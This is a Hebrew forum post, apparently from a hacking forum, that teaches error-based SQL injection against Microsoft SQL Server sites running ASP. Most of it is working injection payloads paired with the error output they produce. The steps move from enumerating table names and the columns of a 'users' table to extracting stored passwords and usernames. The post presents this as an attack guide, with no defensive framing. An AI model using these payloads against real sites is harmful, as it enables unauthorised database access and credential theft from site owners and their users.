שלום לכולם ,היום אני הולך ללמד אותכם הזרקה למסד מסוג MSSQL.
יש כמה שיטות.
כמו having group וכדומה..
אבל כאן תלמדו שיטה אחרת.
טוב איך אנחנו יודעים שזה מסוג MSSQL?
אם נוסיף ' כמו בSQLI זה יתן לנו את השגיאה הזאתי:
קוד:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]
/index.asp, line 56
על מנת לראות את הטבלה הראשונית נזריק את השאילתה הבאה:
קוד:
and 1=convert(int,(select top 1 table_name from information_schema.tables))--
עכשיו נקבל את השגיאה ההזאת:
קוד:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'page' to a column of data type int.
/index.asp, line 56
קיבלנו שpage היא הטבלה הראשונית.
עכשיו איך נמשיך?
קוד:
nd 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('page')))--
לאחר מכן תוצג לנו השגיאה הבאה:
קוד:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/index.asp, line 56
כעת נעשה כך:
קוד:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('page','category')))--
מיפה נמשיך הלאה מכיוון עד שאין כבר טבלאות
כעת נשלוף את העמודות.
קוד:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))--
עכשיו תיווצר שגיאה כזאתי:
קוד:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'password' to a column of data type int.
/index.asp, line 56
מיכאן מבינים שיש עמודה בשם password.
עכשיו נמשיך כך:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('password')))--
עכשיו תתקבל עוד שגיאה עם העמודה username
קוד:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'username' to a column of data type int.
/index.asp, line 56
עכשיו אם אנחנו רוצים לראות אם יש עוד עמודות נעשה כך
קוד:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('password','username')))--
ומיפה נמשיך הלאה..
כעת איך אנחנו שולפים?
קוד:
and 1=convert(int,(select top 1 password from users))--
שלפנו את העמודה password מהטבלה users.
כעת נשלוף username.
קוד:
and 1=convert(int,(select top 1 username from users))--
סופו של המדריך ,בהצלחה לכולם : )
מדריך - הזרקה למסדי MSSQL
ציטוט ההודעה
